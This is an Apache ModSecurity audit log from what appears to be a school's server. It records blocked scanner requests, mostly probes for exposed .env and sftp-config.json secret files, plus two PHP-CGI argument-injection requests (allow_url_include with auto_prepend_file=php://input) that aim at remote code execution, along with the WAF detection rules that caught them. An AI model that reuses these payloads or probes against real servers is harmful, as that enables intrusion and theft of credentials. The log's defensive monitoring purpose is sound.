X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --922d7a65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --922d7a65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744853098646760 650 (- - -) Stopwatch2: 1744853098646760 650; combined=248, p1=222, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --922d7a65-Z-- --243c526c-A-- [17/Apr/2025:11:06:16 +0700] aAB-OJttSyr0uJld9k4q1gAAANg 103.236.140.4 41042 103.236.140.4 8181 --243c526c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 YaBrowser/19.6.2.594 (beta) Yowser/2.5 Safari/537.36 Accept-Charset: utf-8 --243c526c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --243c526c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744862776539810 781 (- - -) Stopwatch2: 1744862776539810 781; combined=374, p1=334, p2=0, p3=0, p4=0, p5=39, sr=139, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --243c526c-Z-- --5780450d-A-- [17/Apr/2025:13:04:46 +0700] aACZ_t9Bm7jS0aoVS7Lo6gAAAIk 103.236.140.4 34994 103.236.140.4 8181 --5780450d-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.141.38 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.141.38 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.25.1 Accept: */* Content-Type: application/x-www-form-urlencoded --5780450d-C-- --5780450d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5780450d-E-- --5780450d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744869886496014 4305 (- - -) Stopwatch2: 1744869886496014 4305; combined=2840, p1=497, p2=2313, p3=0, p4=0, p5=30, sr=105, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5780450d-Z-- --64975614-A-- [17/Apr/2025:17:07:37 +0700] aADS6ZttSyr0uJld9k6oUAAAANc 103.236.140.4 48808 103.236.140.4 8181 --64975614-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --64975614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64975614-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744884457211639 829 (- - -) Stopwatch2: 1744884457211639 829; combined=344, p1=301, p2=0, p3=0, p4=0, p5=43, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64975614-Z-- --816a585d-A-- [17/Apr/2025:17:07:40 +0700] aADS7CdHtgGT4CGaO0jxOgAAAEk 103.236.140.4 48824 103.236.140.4 8181 --816a585d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --816a585d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --816a585d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744884460125428 700 (- - -) Stopwatch2: 1744884460125428 700; combined=266, p1=228, p2=0, p3=0, p4=0, p5=37, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --816a585d-Z-- --b6fe030e-A-- [17/Apr/2025:17:44:37 +0700] aADblSdHtgGT4CGaO0j0uwAAAEM 103.236.140.4 34624 103.236.140.4 8181 --b6fe030e-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 124.115.231.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 124.115.231.142 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --b6fe030e-C-- --b6fe030e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6fe030e-E-- --b6fe030e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744886677134838 4989 (- - -) Stopwatch2: 1744886677134838 4989; combined=3678, p1=534, p2=3109, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6fe030e-Z-- --908cca21-A-- [17/Apr/2025:18:10:04 +0700] aADhjCdHtgGT4CGaO0j2NwAAAEk 103.236.140.4 40214 103.236.140.4 8181 --908cca21-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.108.196 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.108.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --908cca21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --908cca21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744888204649937 799 (- - -) Stopwatch2: 1744888204649937 799; combined=356, p1=321, p2=0, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --908cca21-Z-- --03a1930f-A-- [17/Apr/2025:18:58:37 +0700] aADs7d9Bm7jS0aoVS7I2xAAAAIk 103.236.140.4 38886 103.236.140.4 8181 --03a1930f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --03a1930f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03a1930f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744891117628937 788 (- - -) Stopwatch2: 1744891117628937 788; combined=303, p1=267, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03a1930f-Z-- --29c79f0c-A-- [17/Apr/2025:18:58:42 +0700] aADs8j2cuLCXMl1vWbCRdwAAAAo 103.236.140.4 38906 103.236.140.4 8181 --29c79f0c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --29c79f0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29c79f0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744891122416030 906 (- - -) Stopwatch2: 1744891122416030 906; combined=423, p1=380, p2=0, p3=0, p4=0, p5=43, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29c79f0c-Z-- --1a2cef19-A-- [17/Apr/2025:19:19:42 +0700] aADx3j2cuLCXMl1vWbCSyQAAABg 103.236.140.4 43456 103.236.140.4 8181 --1a2cef19-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.222.147.167 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.222.147.167 X-Forwarded-Proto: https Connection: close Content-Length: 28 content-type: application/dns-message accept: application/dns-message user-agent: Chrome --1a2cef19-C-- 9googlecom --1a2cef19-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a2cef19-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744892382505929 4215 (- - -) Stopwatch2: 1744892382505929 4215; combined=2651, p1=556, p2=1998, p3=31, p4=34, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a2cef19-Z-- --7a0c0d4d-A-- [17/Apr/2025:20:02:39 +0700] aAD77ydHtgGT4CGaO0gF-AAAAFA 103.236.140.4 54414 103.236.140.4 8181 --7a0c0d4d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 209.141.45.70 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 209.141.45.70 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --7a0c0d4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a0c0d4d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744894959489953 714 (- - -) Stopwatch2: 1744894959489953 714; combined=274, p1=236, p2=0, p3=0, p4=0, p5=38, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a0c0d4d-Z-- --2e3a5b4c-A-- [17/Apr/2025:20:46:41 +0700] aAEGQSdHtgGT4CGaO0gIWQAAAEs 103.236.140.4 35716 103.236.140.4 8181 --2e3a5b4c-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 89.21.85.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.21.85.27 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --2e3a5b4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e3a5b4c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744897601958816 882 (- - -) Stopwatch2: 1744897601958816 882; combined=335, p1=294, p2=0, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e3a5b4c-Z-- --e292171c-A-- [18/Apr/2025:00:06:24 +0700] aAE1ED2cuLCXMl1vWbCoXgAAAAw 103.236.140.4 55530 103.236.140.4 8181 --e292171c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --e292171c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e292171c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744909584001646 785 (- - -) Stopwatch2: 1744909584001646 785; combined=357, p1=316, p2=0, p3=0, p4=0, p5=41, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e292171c-Z-- --08bbd451-A-- [18/Apr/2025:00:06:27 +0700] aAE1E5ttSyr0uJld9k7KfgAAAMQ 103.236.140.4 55546 103.236.140.4 8181 --08bbd451-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --08bbd451-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08bbd451-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744909587455744 810 (- - -) Stopwatch2: 1744909587455744 810; combined=335, p1=280, p2=0, p3=0, p4=0, p5=55, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08bbd451-Z-- --f69b4716-A-- [18/Apr/2025:01:25:50 +0700] aAFHrt9Bm7jS0aoVS7JOwgAAAIg 103.236.140.4 50624 103.236.140.4 8181 --f69b4716-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.69.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.69.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1 Accept-Charset: utf-8 --f69b4716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f69b4716-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744914350646214 891 (- - -) Stopwatch2: 1744914350646214 891; combined=446, p1=403, p2=0, p3=0, p4=0, p5=42, sr=133, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f69b4716-Z-- --781d6235-A-- [18/Apr/2025:01:28:45 +0700] aAFIXZttSyr0uJld9k7RiAAAAMY 103.236.140.4 53238 103.236.140.4 8181 --781d6235-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.69.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.69.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --781d6235-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --781d6235-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744914525935663 877 (- - -) Stopwatch2: 1744914525935663 877; combined=413, p1=358, p2=0, p3=0, p4=0, p5=55, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --781d6235-Z-- --71dbe304-A-- [18/Apr/2025:01:51:38 +0700] aAFNut9Bm7jS0aoVS7JXewAAAIQ 103.236.140.4 45024 103.236.140.4 8181 --71dbe304-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 47.96.10.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 47.96.10.143 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --71dbe304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71dbe304-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744915898580581 913 (- - -) Stopwatch2: 1744915898580581 913; combined=330, p1=287, p2=0, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71dbe304-Z-- --7b1c4f14-A-- [18/Apr/2025:03:04:14 +0700] aAFevj2cuLCXMl1vWbDFlAAAAA8 103.236.140.4 56994 103.236.140.4 8181 --7b1c4f14-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36 Accept-Charset: utf-8 --7b1c4f14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b1c4f14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744920254974630 747 (- - -) Stopwatch2: 1744920254974630 747; combined=330, p1=293, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b1c4f14-Z-- --394ba828-A-- [18/Apr/2025:03:16:33 +0700] aAFhoT2cuLCXMl1vWbDIwgAAAAI 103.236.140.4 39924 103.236.140.4 8181 --394ba828-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --394ba828-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --394ba828-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744920993756490 774 (- - -) Stopwatch2: 1744920993756490 774; combined=304, p1=266, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --394ba828-Z-- --a6c58847-A-- [18/Apr/2025:04:29:14 +0700] aAFyqhk6uTiIdxrJEESvSAAAANc 103.236.140.4 41400 103.236.140.4 8181 --a6c58847-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.253.92.249 X-Forwarded-Host: 103.236.140.4 